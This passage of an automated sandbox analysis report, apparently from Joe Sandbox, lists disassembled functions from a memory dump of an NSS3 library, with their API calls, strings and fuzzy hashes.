fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C680F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C680F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C680F2B

Strings

Aborting, xrefs: 6C680EB3
Assertion failure: %s, at %s:%d, xrefs: 6C680ED9, 6C680EE5, 6C680F06, 6C680F0B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 71d6d2c90bc7342bfa511eaa98c12e73e536b91fb1709192a53c3f0a0a6affc3
Instruction ID: 26ae972cd2659cb6ef747ccfff257ace513655800f4cff7ca19a21ca4ad1e6ae
Opcode Fuzzy Hash: 71d6d2c90bc7342bfa511eaa98c12e73e536b91fb1709192a53c3f0a0a6affc3
Instruction Fuzzy Hash: 04F0A4B99001147BDF003BA19C89C9B3E2DDF82364F004424FD0A56A12DA36EA65D6BB

Function 6C5E4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C5E4DCB

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C5E4DE1

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C5E4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5E4E59

Part of subcall function 6C5CFAB0: free.MOZGLUE(?,-00000001,?,?,6C56F673,00000000,00000000), ref: 6C5CFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C6A300C,00000000), ref: 6C5E4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C5E4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C5E4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5E521A

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 4bba7f7fd7e3f91ce3e5d29ec83e938f9ea96a1e1f6e3833ecd1f1303ed5994d
Instruction ID: bb8945aa63ff59dc16dd246b5c817a153984ee42dd9ac7444fc8f6b335933d6c
Opcode Fuzzy Hash: 4bba7f7fd7e3f91ce3e5d29ec83e938f9ea96a1e1f6e3833ecd1f1303ed5994d
Instruction Fuzzy Hash: E3F19D71E00209CBDB08CF95D8407AEB7B2FF88318F658169E915AB781E735E981CF91

Function 6C574FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C6C0148,?,6C586FEC), ref: 6C57502A
PR_NewLock.NSS3(00000001,00000000,6C6C0148,?,6C586FEC), ref: 6C575034
PL_NewHashTable.NSS3(00000000,6C5CFE80,6C5CFD30,6C61C350,00000000,00000000,00000001,00000000,6C6C0148,?,6C586FEC), ref: 6C575055
PL_NewHashTable.NSS3(00000000,6C5CFE80,6C5CFD30,6C61C350,00000000,00000000,?,00000001,00000000,6C6C0148,?,6C586FEC), ref: 6C57506D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 6bb6d22e185fbd264fdc0be294d2b6779e57244ec7eefd434b054a11c89b48aa
Instruction ID: a7565d675f6585a19c8b97b92e4086f3c4598e6a757da2a42235501997dd735f
Opcode Fuzzy Hash: 6bb6d22e185fbd264fdc0be294d2b6779e57244ec7eefd434b054a11c89b48aa
Instruction Fuzzy Hash: C631E7B1B012209BEB209B67CD8CB4737B8AB5330CF418125EB0587640D775AD94CBF9

Function 6C512E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C512F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C512FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C513005
memcpy.VCRUNTIME140(?,?,?), ref: 6C5130EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C513131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C513178

Strings

database corruption, xrefs: 6C51316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C513022, 6C513156, 6C513162, 6C51318A, 6C513196, 6C5131A2, 6C5131AE, 6C5131BA, 6C5131C6
%s at line %d of [%.10s], xrefs: 6C513171

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: d0ea533a54d0e4e16013a838d1d2aeca3c5fb0d2bbc7a85e31114eb5b891c6f8
Instruction ID: 0e02447edfe2848a3ce3e866cf4de5c492b1c83409a9e614be708c592d724024
Opcode Fuzzy Hash: d0ea533a54d0e4e16013a838d1d2aeca3c5fb0d2bbc7a85e31114eb5b891c6f8
Instruction Fuzzy Hash: 21B1C3B0E492199FDB08CF9DCC99AEEB7B1BF49314F144429E805B7B41D374A942CBA4

Function 6C5E7F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C5E7FB2

Part of subcall function 6C56BA40: TlsGetValue.KERNEL32 ref: 6C56BA51
Part of subcall function 6C56BA40: TlsGetValue.KERNEL32 ref: 6C56BA6B
Part of subcall function 6C56BA40: EnterCriticalSection.KERNEL32 ref: 6C56BA83
Part of subcall function 6C56BA40: TlsGetValue.KERNEL32 ref: 6C56BAA1
Part of subcall function 6C56BA40: _PR_MD_UNLOCK.NSS3 ref: 6C56BAC0

PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C5E7FD4

Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390AB
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390C9
Part of subcall function 6C639090: EnterCriticalSection.KERNEL32 ref: 6C6390E5
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639116
Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C63913F

Part of subcall function 6C5E9430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C5E9466

PR_ExitMonitor.NSS3(?), ref: 6C5E801B
PR_EnterMonitor.NSS3(?), ref: 6C5E8034
TlsGetValue.KERNEL32 ref: 6C5E80A2
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5E80C0
PR_ExitMonitor.NSS3(?), ref: 6C5E811C
PR_ExitMonitor.NSS3(?), ref: 6C5E8134

Strings

), xrefs: 6C5E80DB

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
String ID: )
API String ID: 3537756449-2427484129
Opcode ID: 4f7a4b848c3f5a9c874a95a4432f50e2b935e680b7fad9052eb5afd14516c89d
Instruction ID: 5e4bf78569974bb42d8980f96d003d1e5013d7c6ba3afa3e4190c73b0c1ebd2b
Opcode Fuzzy Hash: 4f7a4b848c3f5a9c874a95a4432f50e2b935e680b7fad9052eb5afd14516c89d
Instruction Fuzzy Hash: 3F515CB5A047049BE7219F39DC017EB77B0AF5A30CF08052EDD5956A52EB31AA08CB97

Function 6C58FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C58FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C58FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C58FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C58FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C58FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C58FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C58FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C58FD84

Strings

:, xrefs: 6C58FD78

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 450a7b3eb469f44851d5c8cb77ae462eabc33325a71a475eb488fa8751b2d91c
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: D33105B6E032259BEB008BA4DC017AF77A8EF59318F150634DD15A7B00E771EA08C7E6

Function 6C570F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C570F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C570F84

Part of subcall function 6C5CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A18D0,?), ref: 6C5CB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C58F59B,6C69890C,?), ref: 6C570FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C570FC1

Part of subcall function 6C5D0BE0: malloc.MOZGLUE(6C5C8D2D,?,00000000,?), ref: 6C5D0BF8
Part of subcall function 6C5D0BE0: TlsGetValue.KERNEL32(6C5C8D2D,?,00000000,?), ref: 6C5D0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C570FDB
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C570FEF
PL_FreeArenaPool.NSS3(?), ref: 6C571001
PL_FinishArenaPool.NSS3(?), ref: 6C571009

Strings

security, xrefs: 6C570F5C

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 2d0aa329a2ce08a89c3b9457c9957500022d2a226aab8c737141e20e234a94a1
Instruction ID: 866bdb5c83ab37341f5e2ddecc4e4715dd78236f544b638d8de54fd07f3170b5
Opcode Fuzzy Hash: 2d0aa329a2ce08a89c3b9457c9957500022d2a226aab8c737141e20e234a94a1
Instruction Fuzzy Hash: 81210671904304ABE7109F28DC81EAB77B4EF8565CF058519FC1897601FB32E956CBE6

Function 6C576DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C577D8F,6C577D8F,?,?), ref: 6C576DC8

Part of subcall function 6C5CFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C5CFE08
Part of subcall function 6C5CFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C5CFE1D
Part of subcall function 6C5CFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C5CFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C577D8F,?,?), ref: 6C576DD5

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C698FA0,00000000,?,?,?,?,6C577D8F,?,?), ref: 6C576DF7

Part of subcall function 6C5CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A18D0,?), ref: 6C5CB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C576E35

Part of subcall function 6C5CFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C5CFE29
Part of subcall function 6C5CFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C5CFE3D
Part of subcall function 6C5CFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C5CFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C576E4C

Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C698FE0,00000000), ref: 6C576E82

Part of subcall function 6C576AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C57B21D,00000000,00000000,6C57B219,?,6C576BFB,00000000,?,00000000,00000000,?,?,?,6C57B21D), ref: 6C576B01
Part of subcall function 6C576AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C576B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C576F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C576F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C698FE0,00000000), ref: 6C576F6B
PR_SetError.NSS3(FFFFE005,00000000,6C577D8F,?,?), ref: 6C576FE1

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 11ff3f58ae0cec060a18088fb931b63da5ac0885348f7f62100dbdf2f070dffe
Instruction ID: 86f1709bfee57bbe3f1e73a4daca9c030cdb56158523b6de46385fec522b4e7e
Opcode Fuzzy Hash: 11ff3f58ae0cec060a18088fb931b63da5ac0885348f7f62100dbdf2f070dffe
Instruction Fuzzy Hash: EA716F71E107469BDB10CF55CD40AAABBA4FF95348F155229E808D7B11FB70EAD4CBA0

Function 6C5B0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B1085
PK11_GetAllTokens.NSS3 ref: 6C5B10B1
free.MOZGLUE(?), ref: 6C5B1107
PR_SetError.NSS3(00000000,00000000), ref: 6C5B1172
free.MOZGLUE(?), ref: 6C5B1182
free.MOZGLUE(?), ref: 6C5B11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C5B11C5

Part of subcall function 6C5B52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C58EAC5,00000001), ref: 6C5B52DF
Part of subcall function 6C5B52C0: EnterCriticalSection.KERNEL32(?), ref: 6C5B52F3
Part of subcall function 6C5B52C0: PR_Unlock.NSS3(?), ref: 6C5B5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5B11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5B11F3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: c72690f3e03179df5fdf8351db1eb9bf9b90c17eaa19826106fd73fe88afe420
Instruction ID: a3e26483447de5cd628ff96d23666cdc4496f5f941d6838e16ef8d41c784dc14
Opcode Fuzzy Hash: c72690f3e03179df5fdf8351db1eb9bf9b90c17eaa19826106fd73fe88afe420
Instruction Fuzzy Hash: 1D6192B0E013499BEB00DFA5DC95BAFBBB4AF44348F144128E819BB741EB31E945CB55

Function 6C5BADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAE10
EnterCriticalSection.KERNEL32(?,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C59D079,00000000,00000001), ref: 6C5BAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAE7F
TlsGetValue.KERNEL32(?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAEF1
free.MOZGLUE(6C59CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C59CDBB,?), ref: 6C5BAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C59CDBB,?,6C59D079,00000000,00000001), ref: 6C5BAF30

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 599a2574bd38c3c68f0cf8a33c89e14d4f54fc929f4400499f9675242b344226
Instruction ID: 6666fb79e48025e899fefc8ae0a5d65187968dbf5403802d9f9cba29d2e89566
Opcode Fuzzy Hash: 599a2574bd38c3c68f0cf8a33c89e14d4f54fc929f4400499f9675242b344226
Instruction Fuzzy Hash: CE51AEB5A00601EFDB01DF2ADC84A66BBB4FF05318F144664E809A7E11E731F9A4CBD1

Function 6C594CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C59AB7F,?,00000000,?), ref: 6C594CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C59AB7F,?,00000000,?), ref: 6C594CC8
TlsGetValue.KERNEL32(?,6C59AB7F,?,00000000,?), ref: 6C594CE0
EnterCriticalSection.KERNEL32(?,?,6C59AB7F,?,00000000,?), ref: 6C594CF4
PL_HashTableLookup.NSS3(?,?,?,6C59AB7F,?,00000000,?), ref: 6C594D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C594D10

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C594D26

Part of subcall function 6C639DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C680A27), ref: 6C639DC6
Part of subcall function 6C639DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C680A27), ref: 6C639DD1

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C594D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C594DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C594E02

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
